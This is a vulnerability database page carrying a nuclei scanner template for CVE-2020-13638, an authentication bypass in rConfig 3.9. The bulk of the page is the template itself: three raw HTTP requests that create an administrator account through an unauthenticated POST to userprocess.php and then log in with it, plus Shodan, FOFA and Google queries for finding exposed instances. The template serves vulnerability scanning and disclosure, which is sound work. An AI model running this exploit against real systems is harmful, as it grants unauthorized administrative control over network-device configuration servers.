Lucene search
K

rConfig 3.9 - Authentication Bypass(Admin Login)

šŸ—“ļøĀ 07 Jul 2026Ā 16:50:48Reported byĀ ProjectDiscoveryTypeĀ 
nuclei
Ā nuclei
šŸ”—Ā github.comšŸ‘Ā 26Ā Views

rConfig 3.9 Authentication Bypas

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2020-13638
13 Nov 202022:33
–circl
CVE
CVE-2020-13638
13 Nov 202019:53
–cve
Cvelist
CVE-2020-13638
13 Nov 202019:53
–cvelist
NVD
CVE-2020-13638
13 Nov 202020:15
–nvd
OSV
CVE-2020-13638
13 Nov 202020:15
–osv
Prion
Authentication flaw
13 Nov 202020:15
–prion
RedhatCVE
CVE-2020-13638
22 May 202515:55
–redhatcve
VulnCheck KEV
VulnCheck KEV: CVE-2020-13638
19 Dec 202300:00
–vulncheck_kev
id: CVE-2020-13638

info:
  name: rConfig 3.9 - Authentication Bypass(Admin Login)
  author: theamanrawat
  severity: critical
  description: |
    lib/crud/userprocess.php in rConfig 3.9.x before 3.9.7 has an authentication bypass, leading to administrator account creation. This issue has been fixed in 3.9.7.
  impact: |
    Unauthenticated attackers can bypass authentication to create administrator accounts, leading to complete control over the rConfig installation and access to all network device configurations.
  remediation: |
    Upgrade to rConfig version 3.9.7 or later.
  reference:
    - https://www.rconfig.com/downloads/rconfig-3.9.4.zip
    - https://theguly.github.io/2020/09/rconfig-3.9.4-multiple-vulnerabilities/
    - https://nvd.nist.gov/vuln/detail/CVE-2020-13638
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-13638
    cwe-id: CWE-269
    epss-score: 0.76758
    epss-percentile: 0.99489
    cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: rconfig
    product: rconfig
    shodan-query:
      - http.title:"rConfig"
      - http.title:"rconfig"
    fofa-query: title="rconfig"
    google-query: intitle:"rconfig"
  tags: cve,cve2020,rconfig,auth-bypass,intrusive,vkev,vuln
variables:
  username: "{{to_lower(rand_text_alpha(5))}}"
  password: "{{rand_text_alphanumeric(12)}}!"
  email: "{{rand_base(8)}}@{{rand_base(5)}}.com"

http:
  - raw:
      - |
        POST /lib/crud/userprocess.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=01b28e152ee044338224bf647275f8eb

        --01b28e152ee044338224bf647275f8eb
        Content-Disposition: form-data; name="username"

        {{username}}
        --01b28e152ee044338224bf647275f8eb
        Content-Disposition: form-data; name="passconf"

        {{password}}
        --01b28e152ee044338224bf647275f8eb
        Content-Disposition: form-data; name="password"

        {{password}}
        --01b28e152ee044338224bf647275f8eb
        Content-Disposition: form-data; name="email"

        {{email}}
        --01b28e152ee044338224bf647275f8eb
        Content-Disposition: form-data; name="editid"


        --01b28e152ee044338224bf647275f8eb
        Content-Disposition: form-data; name="add"

        add
        --01b28e152ee044338224bf647275f8eb
        Content-Disposition: form-data; name="ulevelid"

        9
        --01b28e152ee044338224bf647275f8eb--
      - |
        GET /login.php HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /lib/crud/userprocess.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        user={{username}}&pass={{password}}&sublogin=1

    host-redirects: true

    matchers-condition: and
    matchers:
      - type: word
        part: body_3
        words:
          - "rConfig - Configuration Management"
          - "Logged in as"
          - "dashboadFieldSet"
        condition: and

      - type: word
        part: header_3
        words:
          - 'text/html'

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100dcd5722c23b144f5802982ca5da978aeaf8fb711089df130558b3083c99bc631022100e42d5a272b8811bbbdd16c61c541239709a5e383a7d3ce840677ef7df116b494:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation withĀ Vulners data

WeĀ provide theĀ essential building blocks forĀ cybersecurity solutions withĀ comprehensive, structured, andĀ constantly updated vulnerability andĀ exploits data

Api

Power your application withĀ Vulners API

The Vulners REST API offers reliable, high-performance access toĀ vulnerabilityĀ intelligence, withĀ 99.9%Ā SLAĀ uptime andĀ CDN-backed data delivery forĀ seamlessĀ global access

App

Assess and manage vulnerabilities withĀ VulnersĀ tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.1High risk
Vulners AI Score7.1
CVSS 27.5
CVSS 3.19.8
EPSS0.76758
26